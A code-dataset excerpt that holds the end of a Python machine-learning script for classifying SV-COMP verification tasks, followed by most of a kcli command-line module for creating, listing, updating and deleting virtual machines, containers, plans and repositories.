\tplt.scatter(X[y_kmeans == 0, 0], X[y_kmeans == 0, 1], s = 20, c = 'red', label = 'Arrays')\n \tplt.scatter(X[y_kmeans == 1, 0], X[y_kmeans == 1, 1], s = 20, c = 'blue', label = 'BitVectors')\n \tplt.scatter(X[y_kmeans == 2, 0], X[y_kmeans == 2, 1], s = 20, c = 'green', label = 'ControlFlow')\n \tplt.scatter(X[y_kmeans == 3, 0], X[y_kmeans == 3, 1], s = 20, c = 'cyan', label = 'ECA')\n \tplt.scatter(X[y_kmeans == 4, 0], X[y_kmeans == 4, 1], s = 20, c = 'magenta', label = 'Floats')\n \tplt.scatter(X[y_kmeans == 5, 0], X[y_kmeans == 5, 1], s = 20, c = 'pink', label = 'Heap')\n \tplt.scatter(X[y_kmeans == 6, 0], X[y_kmeans == 6, 1], s = 20, c = 'orange', label = 'Loops')\n \tplt.scatter(X[y_kmeans == 7, 0], X[y_kmeans == 7, 1], s = 20, c = 'purple', label = 'ProductLines')\n \tplt.scatter(X[y_kmeans == 8, 0], X[y_kmeans == 8, 1], s = 20, c = 'navy', label = 'Recursive')\n \tplt.scatter(X[y_kmeans == 9, 0], X[y_kmeans == 9, 1], s = 20, c = 'lime', label = 'Sequentialized')\n \tplt.scatter(X[y_kmeans == 10, 0], X[y_kmeans == 10, 1], s = 20, c = 'yellow', label = 'DeviceDrivers')\n \tplt.scatter(kmeans.cluster_centers_[:,0], kmeans.cluster_centers_[:,1], s = 20, c = 'black', label = 'Centroids')\n \t#plt.title(name + ' Cluster')\n \tplt.xlabel(name+'1')\n \tplt.ylabel(name+ '2')\n \tplt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.1),\n ncol=4, fancybox=True, shadow=True)\n \tplt.show()\n\n\n def logistic_reg(self, X_train, y_train, X_test):\n # Fitting Logistic Regression to the Training set\n from sklearn.linear_model import LogisticRegression\n classifier = LogisticRegression(random_state = 0)\n classifier.fit(X_train, y_train)\n\n # Predicting the Test set results\n pred = classifier.predict(X_test)\n return pred\n\n def rand_forest(self, X_train, y_train, X_test, y_test=None, tmp=None, j=0):\n # Fitting Random Forest Classification to the Training set\n from sklearn.ensemble import RandomForestClassifier\n classifier = RandomForestClassifier(n_estimators = 100, criterion = \"entropy\", random_state = 0)\n classifier.fit(X_train, y_train)\n\n y_pred = classifier.predict(X_test)\n if j == 2:\n self.scatter_plot_dim_red(X_train, y_train, classifier, tmp + ' train set')\n self.scatter_plot_dim_red(X_test, y_test, classifier, tmp + ' test set')\n return y_pred\n\n def scatter_plot_dim_red(self, X, Y, classifier, name):\n from matplotlib.colors import ListedColormap\n X_set, y_set = X, Y\n X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1, stop = X_set[:, 0].max() + 1, step = 0.01),\n np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step = 0.01))\n plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),\n alpha = 0.75, cmap = ListedColormap(('red', 'green', 'blue','pink','purple','gray', 'yellow', 'cyan', 'orange', 'lightblue','lightgreen')))\n plt.xlim(X1.min(), X1.max())\n plt.ylim(X2.min(), X2.max())\n for i, j in enumerate(np.unique(y_set)):\n plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],\n c = ListedColormap(('red', 'green', 'blue','pink','purple','gray', 'yellow', 'cyan', 'orange','lightblue','lightgreen'))(i), label = j)\n plt.title(name)\n plt.xlabel('PC1')\n plt.ylabel('PC2')\n plt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.1),\n ncol=4, fancybox=True, shadow=True)\n plt.show()\n\n #Backward elimination with P-values and adjusted R-square\n def backwardElimination(self, x, SL, y, m ,n):\n import statsmodels.formula.api as sm\n numVars = len(x[0])\n\n temp = np.zeros((m,n)).astype(int)\n for i in range(0, numVars):\n regressor_OLS = sm.OLS(y, x).fit()\n maxVar = max(regressor_OLS.pvalues).astype(float)\n\n adjR_before = regressor_OLS.rsquared_adj.astype(float)\n if maxVar > SL:\n for j in range(0, numVars - i):\n if (regressor_OLS.pvalues[j].astype(float) == maxVar):\n #print(maxVar, regressor_OLS.pvalues[j].astype(float))\n temp[:,j] = x[:, j]\n x = np.delete(x, j, 1)\n tmp_regressor = sm.OLS(y, x).fit()\n adjR_after = tmp_regressor.rsquared_adj.astype(float)\n if (adjR_before >= adjR_after):\n x_rollback = np.hstack((x, temp[:,[0,j]]))\n x_rollback = np.delete(x_rollback, j, 1)\n print (regressor_OLS.summary())\n return x_rollback\n else:\n continue\n print(regressor_OLS.summary())\n return x\n","sub_path":"scripts/svcomp_predict/ml.py","file_name":"ml.py","file_ext":"py","file_size_in_byte":6987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"245134342","text":"#!/usr/bin/env python\n# coding=utf-8\n\nfrom distutils.spawn import find_executable\nfrom kvirt.config import Kconfig\nfrom kvirt.baseconfig import Kbaseconfig\nfrom kvirt.containerconfig import Kcontainerconfig\nfrom kvirt.config import __version__\nfrom kvirt.defaults import TEMPLATES\nfrom prettytable import PrettyTable\nimport argparse\nfrom kvirt import common\nfrom kvirt import nameutils\nimport os\nimport random\nimport sys\nimport yaml\n\n\ndef start(args):\n \"\"\"Start vm/container\"\"\"\n container = args.container\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n names = [common.get_lastvm(config.client)] if not args.names else args.names\n k = config.k\n if container:\n cont = Kcontainerconfig(config, client=args.containerclient).cont\n for name in names:\n common.pprint(\"Starting container %s...\" % name)\n cont.start_container(name)\n else:\n codes = []\n for name in names:\n common.pprint(\"Starting vm %s...\" % name)\n result = k.start(name)\n code = common.handle_response(result, name, element='', action='started')\n codes.append(code)\n os._exit(1 if 1 in codes else 0)\n\n\ndef stop(args):\n \"\"\"Stop vm/container\"\"\"\n container = args.container\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n names = [common.get_lastvm(config.client)] if not args.names else args.names\n if config.extraclients:\n ks = config.extraclients\n ks.update({config.client: config.k})\n else:\n ks = {config.client: config.k}\n codes = []\n for cli in ks:\n k = ks[cli]\n if container:\n cont = Kcontainerconfig(config, client=args.containerclient).cont\n for name in names:\n common.pprint(\"Stopping container %s in %s...\" % (name, cli))\n cont.stop_container(name)\n else:\n for name in names:\n common.pprint(\"Stopping vm %s in %s...\" % (name, cli))\n result = k.stop(name)\n code = common.handle_response(result, name, element='', action='stopped')\n codes.append(code)\n os._exit(1 if 1 in codes else 0)\n\n\ndef restart(args):\n \"\"\"Restart vm/container\"\"\"\n container = args.container\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n names = [common.get_lastvm(config.client)] if not args.names else args.names\n k = config.k\n if container:\n cont = Kcontainerconfig(config, client=args.containerclient).cont\n for name in names:\n common.pprint(\"Restarting container %s...\" % name)\n cont.stop_container(name)\n cont.start_container(name)\n else:\n codes = []\n for name in names:\n common.pprint(\"Restarting vm %s...\" % name)\n result = k.restart(name)\n code = common.handle_response(result, name, element='', action='restarted')\n codes.append(code)\n os._exit(1 if 1 in codes else 0)\n\n\ndef console(args):\n \"\"\"Vnc/Spice/Serial/Container console\"\"\"\n serial = args.serial\n container = args.container\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n name = common.get_lastvm(config.client) if not args.name else args.name\n k = config.k\n tunnel = config.tunnel\n if container:\n cont = Kcontainerconfig(config, client=args.containerclient).cont\n cont.console_container(name)\n return\n elif serial:\n k.serialconsole(name)\n else:\n k.console(name=name, tunnel=tunnel)\n\n\ndef delete(args):\n \"\"\"Delete vm/container\"\"\"\n container = args.container\n template = args.template\n snapshots = args.snapshots\n yes = args.yes\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n if config.extraclients:\n allclients = config.extraclients.copy()\n allclients.update({config.client: config.k})\n names = args.names\n if not names:\n common.pprint(\"Can't delete vms on multiple hosts without specifying their names\", color='red')\n os._exit(1)\n else:\n allclients = {config.client: config.k}\n names = [common.get_lastvm(config.client)] if not args.names else args.names\n for cli in sorted(allclients):\n k = allclients[cli]\n common.pprint(\"Deleting on %s\" % cli)\n if not yes:\n common.confirm(\"Are you sure?\")\n if container:\n codes = [0]\n cont = Kcontainerconfig(config, client=args.containerclient).cont\n for name in names:\n common.pprint(\"Deleting container %s\" % name)\n cont.delete_container(name)\n elif template:\n # k = config.k\n codes = []\n for name in names:\n # shortname = os.path.basename(url)\n # template = os.path.basename(template)\n result = k.delete_image(name)\n if result['result'] == 'success':\n common.pprint(\"%s deleted\" % name)\n codes.append(0)\n else:\n reason = result['reason']\n common.pprint(\"Could not delete %s because %s\" % (name, reason), color='red')\n codes.append(1)\n else:\n codes = []\n for name in names:\n dnsclient, domain = k.dnsinfo(name)\n result = k.delete(name, snapshots=snapshots)\n if result['result'] == 'success':\n common.pprint(\"%s deleted\" % name)\n codes.append(0)\n common.set_lastvm(name, cli, delete=True)\n else:\n reason = result['reason']\n common.pprint(\"Could not delete %s because %s\" % (name, reason), color='red')\n codes.append(1)\n if dnsclient is not None and domain is not None:\n z = Kconfig(client=dnsclient).k\n z.delete_dns(name, domain)\n os._exit(1 if 1 in codes else 0)\n\n\ndef download(args):\n \"\"\"Download Template\"\"\"\n pool = args.pool\n templates = args.templates\n cmd = args.cmd\n url = args.url\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n result = config.handle_host(pool=pool, templates=templates, download=True, cmd=cmd, url=url)\n if result['result'] == 'success':\n os._exit(0)\n else:\n os._exit(1)\n\n\ndef info(args):\n \"\"\"Get info on vm\"\"\"\n output = args.output\n fields = args.fields.split(',') if args.fields is not None else []\n values = args.values\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n names = [common.get_lastvm(config.client)] if not args.names else args.names\n k = config.k\n for name in names:\n data = k.info(name)\n if data:\n print(common.print_info(data, output=output, fields=fields, values=values, pretty=True))\n\n\ndef host(args):\n \"\"\"Handle host\"\"\"\n enable = args.enable\n disable = args.disable\n sync = args.sync\n if enable:\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n result = baseconfig.enable_host(enable)\n elif disable:\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n result = baseconfig.disable_host(disable)\n else:\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone,\n namespace=args.namespace)\n result = config.handle_host(sync=sync)\n if result['result'] == 'success':\n os._exit(0)\n else:\n os._exit(1)\n\n\ndef _list(args):\n \"\"\"List hosts, profiles, flavors, templates, isos, pools or vms\"\"\"\n clients = args.clients\n profiles = args.profiles\n flavors = args.flavors\n templates = args.templates\n isos = args.isos\n disks = args.disks\n pools = args.pools\n repos = args.repos\n products = args.products\n networks = args.networks\n subnets = args.subnets\n loadbalancers = args.loadbalancers\n containers = args.containers\n images = args.images\n plans = args.plans\n filters = args.filters\n short = args.short\n group = args.group\n repo = args.repo\n if clients:\n clientstable = PrettyTable([\"Client\", \"Type\", \"Enabled\", \"Current\"])\n clientstable.align[\"Client\"] = \"l\"\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n for client in sorted(baseconfig.clients):\n enabled = baseconfig.ini[client].get('enabled', True)\n _type = baseconfig.ini[client].get('type', 'kvm')\n if client == baseconfig.client:\n clientstable.add_row([client, _type, enabled, 'X'])\n else:\n clientstable.add_row([client, _type, enabled, ''])\n print(clientstable)\n return\n if repos:\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n repos = PrettyTable([\"Repo\", \"Url\"])\n repos.align[\"Repo\"] = \"l\"\n reposinfo = baseconfig.list_repos()\n for repo in sorted(reposinfo):\n url = reposinfo[repo]\n repos.add_row([repo, url])\n print(repos)\n return\n elif products:\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n products = PrettyTable([\"Repo\", \"Group\", \"Product\", \"Description\", \"Numvms\", \"Memory\"])\n products.align[\"Repo\"] = \"l\"\n productsinfo = baseconfig.list_products(group=group, repo=repo)\n for product in sorted(productsinfo, key=lambda x: (x['repo'], x['group'], x['name'])):\n name = product['name']\n repo = product['repo']\n description = product.get('description', 'N/A')\n numvms = product.get('numvms', 'N/A')\n memory = product.get('memory', 'N/A')\n group = product.get('group', 'N/A')\n products.add_row([repo, group, name, description, numvms, memory])\n print(products)\n return\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n if config.client != 'all':\n k = config.k\n if pools:\n pools = k.list_pools()\n if short:\n poolstable = PrettyTable([\"Pool\"])\n for pool in sorted(pools):\n poolstable.add_row([pool])\n else:\n poolstable = PrettyTable([\"Pool\", \"Path\"])\n for pool in sorted(pools):\n poolpath = k.get_pool_path(pool)\n poolstable.add_row([pool, poolpath])\n poolstable.align[\"Pool\"] = \"l\"\n print(poolstable)\n return\n if networks:\n networks = k.list_networks()\n common.pprint(\"Listing Networks...\")\n if short:\n networkstable = PrettyTable([\"Network\"])\n for network in sorted(networks):\n networkstable.add_row([network])\n else:\n networkstable = PrettyTable([\"Network\", \"Type\", \"Cidr\", \"Dhcp\", \"Domain\", \"Mode\"])\n for network in sorted(networks):\n networktype = networks[network]['type']\n cidr = networks[network]['cidr']\n dhcp = networks[network]['dhcp']\n mode = networks[network]['mode']\n if 'domain' in networks[network]:\n domain = networks[network]['domain']\n else:\n domain = 'N/A'\n networkstable.add_row([network, networktype, cidr, dhcp, domain, mode])\n networkstable.align[\"Network\"] = \"l\"\n print(networkstable)\n return\n if subnets:\n subnets = k.list_subnets()\n common.pprint(\"Listing Subnets...\")\n if short:\n subnetstable = PrettyTable([\"Subnets\"])\n for subnet in sorted(subnets):\n subnetstable.add_row([subnet])\n else:\n subnetstable = PrettyTable([\"Subnet\", \"Az\", \"Cidr\", \"Network\"])\n for subnet in sorted(subnets):\n cidr = subnets[subnet]['cidr']\n az = subnets[subnet]['az']\n if 'network' in subnets[subnet]:\n network = subnets[subnet]['network']\n else:\n network = 'N/A'\n subnetstable.add_row([subnet, az, cidr, network])\n subnetstable.align[\"Network\"] = \"l\"\n print(subnetstable)\n return\n elif profiles:\n if containers:\n profiles = config.list_containerprofiles()\n if short:\n profilestable = PrettyTable([\"Profile\"])\n for profile in sorted(profiles):\n profilename = profile[0]\n profilestable.add_row([profilename])\n else:\n profilestable = PrettyTable([\"Profile\", \"Image\", \"Nets\", \"Ports\", \"Volumes\", \"Cmd\"])\n for profile in sorted(profiles):\n profilestable.add_row(profile)\n profilestable.align[\"Profile\"] = \"l\"\n print(profilestable)\n else:\n profiles = config.list_profiles()\n if short:\n profilestable = PrettyTable([\"Profile\"])\n for profile in sorted(profiles):\n profilename = profile[0]\n profilestable.add_row([profilename])\n else:\n profilestable = PrettyTable([\"Profile\", \"Flavor\",\n \"Pool\", \"Disks\", \"Template\",\n \"Nets\", \"Cloudinit\", \"Nested\",\n \"Reservedns\", \"Reservehost\"])\n for profile in sorted(profiles):\n profilestable.add_row(profile)\n profilestable.align[\"Profile\"] = \"l\"\n print(profilestable)\n return\n elif flavors:\n flavors = k.flavors()\n if short:\n flavorstable = PrettyTable([\"Flavor\"])\n for flavor in sorted(flavors):\n flavorname = profile[0]\n flavorstable.add_row([flavorname])\n else:\n flavorstable = PrettyTable([\"Flavor\", \"Numcpus\", \"Memory\"])\n for flavor in sorted(flavors):\n flavorstable.add_row(flavor)\n flavorstable.align[\"Flavor\"] = \"l\"\n print(flavorstable)\n return\n elif loadbalancers:\n loadbalancers = config.list_loadbalancer()\n if short:\n loadbalancerstable = PrettyTable([\"Loadbalancer\"])\n for lb in sorted(loadbalancers):\n flavorstable.add_row([lb])\n else:\n loadbalancerstable = PrettyTable([\"LoadBalancer\", \"IPAddress\", \"IPProtocol\", \"Ports\", \"Target\"])\n for lb in sorted(loadbalancers):\n loadbalancerstable.add_row(lb)\n loadbalancerstable.align[\"Loadbalancer\"] = \"l\"\n print(loadbalancerstable)\n return\n elif templates:\n templatestable = PrettyTable([\"Template\"])\n templatestable.align[\"Template\"] = \"l\"\n for template in k.volumes():\n templatestable.add_row([template])\n print(templatestable)\n elif isos:\n isostable = PrettyTable([\"Iso\"])\n isostable.align[\"Iso\"] = \"l\"\n for iso in k.volumes(iso=True):\n isostable.add_row([iso])\n print(isostable)\n elif disks:\n common.pprint(\"Listing disks...\")\n diskstable = PrettyTable([\"Name\", \"Pool\", \"Path\"])\n diskstable.align[\"Name\"] = \"l\"\n disks = k.list_disks()\n for disk in sorted(disks):\n path = disks[disk]['path']\n pool = disks[disk]['pool']\n diskstable.add_row([disk, pool, path])\n print(diskstable)\n elif containers:\n cont = Kcontainerconfig(config, client=args.containerclient).cont\n common.pprint(\"Listing containers...\")\n containers = PrettyTable([\"Name\", \"Status\", \"Image\", \"Plan\", \"Command\", \"Ports\", \"Deploy\"])\n for container in cont.list_containers():\n if filters:\n status = container[1]\n if status == filters:\n containers.add_row(container)\n else:\n containers.add_row(container)\n print(containers)\n elif images:\n if config.type != 'kvm':\n common.pprint(\"Operation not supported on this kind of client.Leaving...\", color='red')\n os._exit(1)\n cont = Kcontainerconfig(config, client=args.containerclient).cont\n common.pprint(\"Listing images...\")\n images = PrettyTable([\"Name\"])\n for image in cont.list_images():\n images.add_row([image])\n print(images)\n elif plans:\n vms = {}\n if config.extraclients:\n plans = PrettyTable([\"Name\", \"Host\", \"Vms\"])\n allclients = config.extraclients.copy()\n allclients.update({config.client: config.k})\n for cli in sorted(allclients):\n currentconfig = Kconfig(client=cli, debug=args.debug, region=args.region, zone=args.zone,\n namespace=args.namespace)\n for plan in currentconfig.list_plans():\n planname = plan[0]\n planvms = plan[1]\n plans.add_row([planname, cli, planvms])\n else:\n plans = PrettyTable([\"Name\", \"Vms\"])\n for plan in config.list_plans():\n planname = plan[0]\n planvms = plan[1]\n plans.add_row([planname, planvms])\n print(plans)\n else:\n customcolumns = {'kubevirt': 'Namespace', 'aws': 'InstanceId', 'openstack': 'Project'}\n customcolumn = customcolumns[config.type] if config.type in customcolumns else 'Report'\n if config.extraclients:\n allclients = config.extraclients.copy()\n allclients.update({config.client: config.k})\n vms = PrettyTable([\"Name\", \"Host\", \"Status\", \"Ips\", \"Source\", \"Plan\", \"Profile\", customcolumn])\n for cli in sorted(allclients):\n for vm in allclients[cli].list():\n name = vm.get('name')\n status = vm.get('status')\n ip = vm.get('ip', '')\n source = vm.get('template', '')\n plan = vm.get('plan', '')\n profile = vm.get('profile', '')\n report = vm.get('report', '')\n vminfo = [name, cli, status, ip, source, plan, profile, report]\n if filters:\n if status == filters:\n vms.add_row(vminfo)\n else:\n vms.add_row(vminfo)\n print(vms)\n else:\n vms = PrettyTable([\"Name\", \"Status\", \"Ips\", \"Source\", \"Plan\", \"Profile\", customcolumn])\n for vm in k.list():\n name = vm.get('name')\n status = vm.get('status')\n ip = vm.get('ip', '')\n source = vm.get('template', '')\n plan = vm.get('plan', '')\n profile = vm.get('profile', '')\n report = vm.get('report', '')\n vminfo = [name, status, ip, source, plan, profile, report]\n if config.planview and vm[4] != config.currentplan:\n continue\n if filters:\n if status == filters:\n vms.add_row(vminfo)\n else:\n vms.add_row(vminfo)\n print(vms)\n return\n\n\ndef vm(args):\n \"\"\"Create vms\"\"\"\n name = args.name\n profile = args.profile\n profilefile = args.profilefile\n overrides = common.get_overrides(paramfile=args.paramfile, param=args.param)\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n if 'name' in overrides:\n name = overrides['name']\n if name is None:\n name = nameutils.get_random_name()\n if config.type in ['gcp', 'kubevirt']:\n name = name.replace('_', '-')\n if config.type != 'aws':\n common.pprint(\"Using %s as name of the vm\" % name)\n if profile is not None and profile.endswith('.yml'):\n profilefile = profile\n profile = None\n if profilefile is not None:\n if not os.path.exists(profilefile):\n common.pprint(\"Missing profile file\", color='red')\n os._exit(1)\n else:\n with open(profilefile, 'r') as entries:\n config.profiles = yaml.safe_load(entries)\n if profile is None:\n if len(config.profiles) == 1:\n profile = list(config.profiles)[0]\n else:\n common.pprint(\"Missing profile\", color='red')\n os._exit(1)\n result = config.create_vm(name, profile, overrides=overrides)\n code = common.handle_response(result, name, element='', action='created', client=config.client)\n return code\n\n\ndef clone(args):\n \"\"\"Clone existing vm\"\"\"\n name = args.name\n base = args.base\n full = args.full\n start = args.start\n common.pprint(\"Cloning vm %s from vm %s...\" % (name, base))\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n k.clone(base, name, full=full, start=start)\n\n\ndef update(args):\n \"\"\"Update ip, memory or numcpus\"\"\"\n ip1 = args.ip1\n flavor = args.flavor\n numcpus = args.numcpus\n memory = args.memory\n plan = args.plan\n autostart = args.autostart\n noautostart = args.noautostart\n dns = args.dns\n host = args.host\n domain = args.domain\n cloudinit = args.cloudinit\n template = args.template\n net = args.network\n information = args.information\n iso = args.iso\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n names = [common.get_lastvm(config.client)] if not args.names else args.names\n for name in names:\n if dns:\n common.pprint(\"Creating Dns entry for %s...\" % name)\n if net is not None:\n nets = [net]\n else:\n nets = k.vm_ports(name)\n if nets and domain is None:\n domain = nets[0]\n if not nets:\n return\n else:\n k.reserve_dns(name=name, nets=nets, domain=domain, ip=ip1)\n elif ip1 is not None:\n common.pprint(\"Updating ip of vm %s to %s...\" % (name, ip1))\n k.update_metadata(name, 'ip', ip1)\n elif cloudinit:\n common.pprint(\"Removing cloudinit information of vm %s\" % name)\n k.remove_cloudinit(name)\n return\n elif plan is not None:\n common.pprint(\"Updating plan of vm %s to %s...\" % (name, plan))\n k.update_metadata(name, 'plan', plan)\n elif template is not None:\n common.pprint(\"Updating template of vm %s to %s...\" % (name, template))\n k.update_metadata(name, 'template', template)\n elif memory is not None:\n common.pprint(\"Updating memory of vm %s to %s...\" % (name, memory))\n k.update_memory(name, memory)\n elif numcpus is not None:\n common.pprint(\"Updating numcpus of vm %s to %s...\" % (name, numcpus))\n k.update_cpus(name, numcpus)\n elif autostart:\n common.pprint(\"Setting autostart for vm %s...\" % name)\n k.update_start(name, start=True)\n elif noautostart:\n common.pprint(\"Removing autostart for vm %s...\" % name)\n k.update_start(name, start=False)\n elif information:\n common.pprint(\"Setting information for vm %s...\" % name)\n k.update_information(name, information)\n elif iso is not None:\n common.pprint(\"Switching iso for vm %s to %s...\" % (name, iso))\n k.update_iso(name, iso)\n elif flavor is not None:\n common.pprint(\"Updating flavor of vm %s to %s...\" % (name, flavor))\n k.update_flavor(name, flavor)\n elif host:\n common.pprint(\"Creating Host entry for vm %s...\" % name)\n nets = k.vm_ports(name)\n if not nets:\n return\n if domain is None:\n domain = nets[0]\n k.reserve_host(name, nets, domain)\n\n\ndef disk(args):\n \"\"\"Add/Delete disk of vm\"\"\"\n name = args.name\n delete = args.delete\n size = args.size\n diskname = args.diskname\n template = args.template\n pool = args.pool\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n if delete:\n if diskname is None:\n common.pprint(\"Missing diskname. Leaving...\", color='red')\n os._exit(1)\n common.pprint(\"Deleting disk %s\" % diskname)\n k.delete_disk(name=name, diskname=diskname, pool=pool)\n return\n if size is None:\n common.pprint(\"Missing size. Leaving...\", color='red')\n os._exit(1)\n if pool is None:\n common.pprint(\"Missing pool. Leaving...\", color='red')\n os._exit(1)\n if name is None:\n common.pprint(\"Missing name. Leaving...\", color='red')\n os._exit(1)\n common.pprint(\"Adding disk to %s...\" % name)\n k.add_disk(name=name, size=size, pool=pool, template=template)\n\n\ndef dns(args):\n \"\"\"Create/Delete dns entries\"\"\"\n delete = args.delete\n name = args.name\n net = args.net\n domain = net\n ip = args.ip\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n if delete:\n common.pprint(\"Deleting Dns entry for %s...\" % name)\n k.delete_dns(name, domain)\n else:\n common.pprint(\"Creating Dns entry for %s...\" % name)\n k.reserve_dns(name=name, nets=[net], domain=domain, ip=ip)\n\n\ndef export(args):\n \"\"\"Export a vm\"\"\"\n template = args.template\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n names = [common.get_lastvm(config.client)] if not args.names else args.names\n k = config.k\n codes = []\n for name in names:\n result = k.export(name=name, template=template)\n if result['result'] == 'success':\n common.pprint(\"Exporting vm %s\" % name)\n codes.append(0)\n else:\n reason = result['reason']\n common.pprint(\"Could not delete vm %s because %s\" % (name, reason), color='red')\n codes.append(1)\n os._exit(1 if 1 in codes else 0)\n\n\ndef lb(args):\n \"\"\"Create/Delete loadbalancer\"\"\"\n checkpath = args.checkpath\n checkport = args.checkport\n yes = args.yes\n delete = args.delete\n ports = args.ports\n domain = args.domain\n internal = args.internal\n vms = args.vms.split(',') if args.vms is not None else []\n ports = args.ports.split(',') if args.ports is not None else []\n name = nameutils.get_random_name().replace('_', '-') if args.name is None else args.name\n if delete and not yes:\n common.confirm(\"Are you sure?\")\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n config.handle_loadbalancer(name, ports=ports, checkpath=checkpath, vms=vms, delete=delete, domain=domain,\n checkport=checkport, internal=internal)\n return 0\n\n\ndef nic(args):\n \"\"\"Add/Delete nic of vm\"\"\"\n name = args.name\n delete = args.delete\n interface = args.interface\n network = args.network\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n if delete:\n common.pprint(\"Deleting nic from %s...\" % name)\n k.delete_nic(name, interface)\n return\n if network is None:\n common.pprint(\"Missing network. Leaving...\", color='red')\n os._exit(1)\n common.pprint(\"Adding Nic %s...\" % name)\n k.add_nic(name=name, network=network)\n\n\ndef pool(args):\n \"\"\"Create/Delete pool\"\"\"\n pool = args.pool\n delete = args.delete\n full = args.delete\n pooltype = args.pooltype\n path = args.path\n thinpool = args.thinpool\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n if delete:\n common.pprint(\"Deleting pool %s...\" % pool)\n k.delete_pool(name=pool, full=full)\n return\n if path is None:\n common.pprint(\"Missing path. Leaving...\", color='red')\n os._exit(1)\n common.pprint(\"Adding pool %s...\" % pool)\n k.create_pool(name=pool, poolpath=path, pooltype=pooltype, thinpool=thinpool)\n\n\ndef plan(args):\n \"\"\"Create/Delete/Stop/Start vms from plan file\"\"\"\n plan = args.plan\n ansible = args.ansible\n url = args.url\n path = args.path\n autostart = args.autostart\n noautostart = args.noautostart\n container = args.container\n inputfile = args.inputfile\n revert = args.revert\n snapshot = args.snapshot\n start = args.start\n stop = args.stop\n restart = args.restart\n delete = args.delete\n delay = args.delay\n yes = args.yes\n info = args.info\n update = args.update\n volumepath = args.volumepath\n paramfile = args.paramfile\n if os.path.exists(\"/i_am_a_container\"):\n inputfile = \"%s/%s\" % (volumepath, inputfile) if inputfile is not None else \"%s/kcli_plan.yml\" % volumepath\n if paramfile is not None:\n paramfile = \"%s/%s\" % (volumepath, paramfile)\n overrides = common.get_overrides(paramfile=paramfile, param=args.param)\n if info and url is None:\n inputfile = plan if inputfile is None and plan is not None else inputfile\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n baseconfig.info_plan(inputfile)\n os._exit(0)\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n if plan is None:\n plan = nameutils.get_random_name()\n common.pprint(\"Using %s as name of the plan\" % plan)\n if delete and not yes:\n common.confirm(\"Are you sure?\")\n config.plan(plan, ansible=ansible, url=url, path=path, autostart=autostart,\n container=container, noautostart=noautostart, inputfile=inputfile,\n start=start, stop=stop, delete=delete, delay=delay, overrides=overrides, info=info, snapshot=snapshot,\n revert=revert, update=update, restart=restart)\n return 0\n\n\ndef repo(args):\n \"\"\"Create/Delete repo\"\"\"\n repo = args.repo\n delete = args.delete\n url = args.url\n update = args.update\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n if update:\n if repo is None:\n common.pprint(\"Updating all repos...\", color='blue')\n repos = baseconfig.list_repos()\n for repo in repos:\n common.pprint(\"Updating repo %s...\" % repo)\n baseconfig.update_repo(repo)\n else:\n common.pprint(\"Updating repo %s...\" % repo)\n baseconfig.update_repo(repo)\n return\n if repo is None:\n common.pprint(\"Missing repo. Leaving...\", color='red')\n os._exit(1)\n if delete:\n common.pprint(\"Deleting repo %s...\" % repo)\n baseconfig.delete_repo(repo)\n return\n if update:\n common.pprint(\"Updating repo %s...\" % repo)\n baseconfig.delete_repo(repo)\n return\n if url is None:\n common.pprint(\"Missing url. Leaving...\", color='red')\n os._exit(1)\n common.pprint(\"Adding repo %s...\" % repo)\n baseconfig.create_repo(repo, url)\n return 0\n\n\ndef product(args):\n \"\"\"Create product\"\"\"\n repo = args.repo\n product = args.product\n latest = args.latest\n group = args.group\n overrides = common.get_overrides(paramfile=args.paramfile, param=args.param)\n plan = overrides['plan'] if 'plan' in overrides else None\n info = args.info\n search = args.search\n if info:\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n common.pprint(\"Providing information on product %s...\" % product)\n baseconfig.info_product(product, repo, group)\n elif search:\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n products = PrettyTable([\"Repo\", \"Group\", \"Product\", \"Description\", \"Numvms\", \"Memory\"])\n products.align[\"Repo\"] = \"l\"\n productsinfo = 